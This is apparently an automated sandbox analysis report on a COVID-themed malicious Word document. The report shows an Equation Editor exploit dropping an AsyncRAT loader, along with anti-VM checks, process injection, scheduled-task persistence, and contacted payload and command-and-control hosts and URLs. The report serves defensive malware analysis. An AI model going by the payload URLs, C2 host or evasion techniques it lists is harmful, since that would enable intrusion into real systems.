Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Source: Yara match	File source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
Source: Yara match	File source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE

Yara detected AsyncRAT

Source: Yara match	File source: 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2468, type: MEMORY
Source: Yara match	File source: 4.2.69577.exe.25b56fc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.69577.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.25b56fc.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\Public\69577.exe

WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 69577.exe, 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, 69577.exe, 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Contains capabilities to detect virtual machines

Source: C:\Users\Public\69577.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum name: 0	Jump to behavior
Source: C:\Users\Public\69577.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\Public\69577.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\Public\69577.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\69577.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\69577.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\Public\69577.exe	Window / User API: threadDelayed 8917			Jump to behavior
Source: C:\Users\Public\69577.exe	Window / User API: threadDelayed 643			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2380	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2324	Thread sleep time: -99889s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2924	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2924	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2760	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2784	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2804	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2804	Thread sleep count: 52 > 30	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 3020	Thread sleep count: 8917 > 30	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 3020	Thread sleep count: 643 > 30	Jump to behavior

Source: C:\Users\Public\69577.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: 69577.exe, 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp	Binary or memory string: vmware
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: 2m"SOFTWARE\VMware, Inc.\VMware Tools483m
Source: 69577.exe, 00000004.00000002.2114360333.00000000002E4000.00000004.00000001.sdmp	Binary or memory string: VMware_S
Source: 69577.exe, 00000004.00000002.2116590485.0000000005920000.00000004.00000001.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: 69577.exe, 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: 2m"SOFTWARE\VMware, Inc.\VMware Tools
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: 2m%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: 69577.exe, 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: 3m"SOFTWARE\VMware, Inc.\VMware Tools
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Enables debug privileges

Source: C:\Users\Public\69577.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\69577.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\Public\69577.exe

Memory written: C:\Users\Public\69577.exe base: 400000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp'	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe	Jump to behavior

Source: 69577.exe, 00000007.00000002.2352370266.00000000024FE000.00000004.00000001.sdmp	Binary or memory string: Program ManagerHD3m
Source: 69577.exe, 00000007.00000002.2352176065.0000000001080000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: 69577.exe, 00000007.00000002.2352176065.0000000001080000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: 69577.exe, 00000007.00000002.2352370266.00000000024FE000.00000004.00000001.sdmp	Binary or memory string: Program ManagerHD3m%
Source: 69577.exe, 00000007.00000002.2352176065.0000000001080000.00000002.00000001.sdmp	Binary or memory string: !Progman
Source: 69577.exe, 00000007.00000002.2353238180.00000000047CA000.00000004.00000001.sdmp	Binary or memory string: Message/Program Managerility Mode] - Microsoft Word Mode] - Micros
Source: 69577.exe, 00000007.00000002.2351851374.0000000000513000.00000004.00000020.sdmp	Binary or memory string: Program ManagerR

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\69577.exe	Queries volume information: C:\Users\Public\69577.exe VolumeInformation			Jump to behavior
Source: C:\Users\Public\69577.exe	Queries volume information: C:\Users\Public\69577.exe VolumeInformation			Jump to behavior

Source: C:\Users\Public\69577.exe

Code function: 4_2_00694B1C GetUserNameA,

4_2_00694B1C

Source: C:\Users\Public\69577.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected AsyncRAT

Source: Yara match	File source: 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2468, type: MEMORY
Source: Yara match	File source: 4.2.69577.exe.25b56fc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.69577.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.25b56fc.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\Public\69577.exe

WMI Queries: IWbemServices::ExecQuery - Select * from AntivirusProduct

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
79.134.225.49	unknown	Switzerland	6775	FINK-TELECOM-SERVICESCH	true
93.89.224.134	unknown	Turkey	51557	TR-FBSTR	false
67.199.248.10	unknown	United States	396982	GOOGLE-PRIVATE-CLOUDUS	false

Contacted Domains

Name	IP	Active
bit.ly	67.199.248.10	true
greatestyear2021.ddns.net	79.134.225.49	true
sgkmudder.org.tr	93.89.224.134	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://sgkmudder.org.tr/2d/mgLD5CcdJx9YVKl.jpg	false	Avira URL Cloud: safe	unknown
http://bit.ly/2Me6ei3	false		high

AV Detection:

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg	ReversingLabs: Detection: 10%
Source: C:\Users\user\AppData\Roaming\rLliXAh.exe	ReversingLabs: Detection: 10%
Source: C:\Users\Public\69577.exe	ReversingLabs: Detection: 10%

Multi AV Scanner detection for submitted file

Source: Deadly Variants of Covid 19.doc

ReversingLabs: Detection: 25%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\rLliXAh.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\69577.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 7.2.69577.exe.400000.0.unpack

Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\69577.exe

Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\Public\69577.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	4_2_00697580
Source: C:\Users\Public\69577.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	4_2_00691D74
Source: C:\Users\Public\69577.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	4_2_00697574
Source: C:\Users\Public\69577.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	4_2_00691D80

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: bit.ly

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 67.199.248.10:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 67.199.248.10:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 79.134.225.49:5000 -> 192.168.2.22:49169

Connects to a URL shortener service

Source: unknown

DNS query: name: bit.ly

Uses dynamic DNS services

Source: unknown

DNS query: name: greatestyear2021.ddns.net

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49169 -> 79.134.225.49:5000

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 79.134.225.49 79.134.225.49
Source: Joe Sandbox View	IP Address: 93.89.224.134 93.89.224.134
Source: Joe Sandbox View	IP Address: 67.199.248.10 67.199.248.10

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /2Me6ei3 HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2d/mgLD5CcdJx9YVKl.jpg HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: sgkmudder.org.tr

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AD9C643-349E-46EF-BF24-C3A751787722}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /2Me6ei3 HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2d/mgLD5CcdJx9YVKl.jpg HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: sgkmudder.org.tr

Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: bit.ly

Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: 69577.exe, 00000007.00000003.2127625486.00000000047F2000.00000004.00000001.sdmp, 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.7.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 69577.exe, 00000007.00000002.2351786512.000000000047C000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enP
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: 69577.exe, 00000004.00000002.2116750494.0000000005EE0000.00000002.00000001.sdmp, 69577.exe, 00000007.00000002.2353539025.0000000004CD0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, 69577.exe, 00000007.00000002.2352229975.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 69577.exe, 00000007.00000002.2354290555.0000000005BB0000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
